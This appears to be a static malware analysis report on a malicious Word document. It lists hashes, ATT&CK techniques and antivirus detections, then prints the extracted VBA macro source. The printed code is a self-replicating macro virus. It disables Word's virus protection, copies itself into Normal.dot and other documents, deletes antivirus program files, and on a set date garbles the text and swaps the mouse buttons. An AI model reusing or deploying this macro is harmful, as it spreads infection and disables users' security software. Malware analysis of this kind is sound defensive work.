Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5c8ff7a3b96e0177…

MALICIOUS

Office (OLE)

36.0 KB Created: 2002-01-30 21:50:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: f514cf899fb9308c22ce757ca1ed5e11 SHA-1: 8c6d2c83fb82e25acbe0b77e754fe692ffd22b72 SHA-256: 5c8ff7a3b96e0177165f5027ac242d66ccb6e151063a129438d3ee4c8b782719
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a Microsoft Word document containing a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening. The macro attempts to export itself to 'C:\Qf914.sys' and includes code that appears to be designed to interfere with antivirus software by attempting to delete files from McAfee and Norton Antivirus directories. The presence of the AutoOpen macro and the ClamAV detections strongly suggest a malicious intent, likely to download and execute a further payload.

Heuristics 4

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4717 bytes
SHA-256: 08c3d397566cd68b96cbf117126aa82daf9d41548d7901890ea56a8a16d91c5c
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Qf914"
Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
Declare Function SwapMouseButton Lib "USER32" (ByVal bSwap As Long) As Long

Sub AutoOpen()

    ' Word97 Macro Virii Creation Kit
    ' ===============================
    ' Code by Jack Twoflower/LzØ Vx
    ' ===============================
    ' W97M.w97mvckbased

On Error Resume Next
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
.ScreenUpdating = False
End With
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
Application.VBE.ActiveVBProject.VBComponents("Qf914").Export "C:\Qf914.sys"
 'This code is a changed version of APMRS | Thanks Pyro
JgAr0 = Application.VBE.SelectedVBComponent.Name
For KD90 = 1 To 20
UgEx842 = ""
PsLn775 = Application.VBE.ActiveVBProject.VBComponents.Item(JgAr0).CodeModule.ProcCountLines("AutoOpen", vbext_pk_Proc)
HhNi187 = Int(Rnd * PsLn775) + 1
VlPk738 = Int(Rnd * 40)
For x = 1 To VlPk738
UgEx842 = UgEx842 & Chr(65 + (Rnd * 22)) & Int(Rnd * 999)
Next x
Application.VBE.ActiveVBProject.VBComponents.Item(JgAr0).CodeModule.InsertLines HhNi187, "Rem " & UgEx842
Next KD90
Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN\*.*")
Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN95\*.*")
Kill ("C:\Programme\Norton Antivirus\V32scan.dll")
Kill ("C:\Programme\Norton Antivirus\Virscan.dat")
Kill ("C:\PROGRAMME\TBAV\TBAV.DAT")
Kill ("C:\TBAV\TBAV.DAT")
Kill ("C:\Programme\Dr Solomon's\Anti-Virus Toolkit\*.*")
If Day(Now()) = 30 And Month(Now()) = 1 Then
Dim a As Variant
Dim b As Variant
Selection.WholeStory
a = Selection
For i = 1 To Len(a)
b = Mid$(a, i, 1)
c = Asc(Mid$(a, i, 1))
d = c + 29
If d > 199 Then c = 30
e$ = e$ + Chr(d)
Next i
Selection.WholeStory
Selection.Cut
WordBasic.Insert e$
While ShowCursor(False) >= 0
Wend
SwapMouseButton &H2
End If
Set Jx985 = ActiveDocument.VBProject.VBComponents
Set Ht615 = NormalTemplate.VBProject.VBComponents
For y = 1 To Ht615.Count
If Ht615(y).Name = "Qf914" Then Ai600 = True
Next y
For y = 1 To Jx985.Count
If Jx985(y).Name = "Qf914" Then Li896 = True
Next y
If Ai600 = True And Li896 = True Then Exit Sub
If Ai600 = True And Li896 <> True Then Jx985.Import "c:\Qf914.sys": ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
If Ai600 <> True And Li896 = True Then Ht615.Import "c:\Qf914.sys": NormalTemplate.Save
If Day(Now()) = 31 Then MsgBox "This virus was created with W97MVCK by Jack Twoflower"
End Sub
Sub ExtrasMakro()
Call AutoOpen
Dim x
ReDim Combobox1__$(0)
Combobox1__$(0) = ""
ReDim Textbox1__$(0)
Textbox1__$(0) = ""
ReDim DropListBox2__$(0)
DropListBox2__$(0) = "Normal.dot (Globale Dokumentvorlage)"
WordBasic.BeginDialog 620, 280, "Makros"
WordBasic.Text 7, 6, 93, 13, "Makro&name:", "Text3"
WordBasic.ComboBox 7, 23, 435, 170, Combobox1__$(), "Combobox1"
WordBasic.PushButton 470, 14, 137, 21, "&Ausführen", "Definierbar2"
WordBasic.CancelButton 470, 38, 137, 21
WordBasic.PushButton 470, 72, 137, 21, "&Schrittweise prüfen", "Definierbar3"
WordBasic.PushButton 470, 96, 137, 21, "&Bearbeiten", "Definierbar4"
WordBasic.PushButton 470, 130, 137, 21, "&Erstellen", "Definierbar5"
WordBasic.PushButton 470, 154, 137, 21, "&Löschen...", "Definierbar6"
WordBasic.PushButton 470, 178, 137, 21, "&Organisieren...", "Definierbar7"
WordBasic.Text 7, 200, 93, 13, "Ma&kros in:", "Text1"
WordBasic.DropListBox 90, 196, 354, 19, DropListBox2__$(), "Listbox2"
WordBasic.Text 7, 222, 109, 13, "Beschreibung:", "Text2"
WordBasic.TextBox 7, 235, 437, 38, Textbox1__$()
WordBasic.EndDialog
Dim dlg As Object: Set dlg = WordBasic.CurValues.UserDialog
x = WordBasic.Dialog.UserDialog(dlg)
Select Case
... (truncated)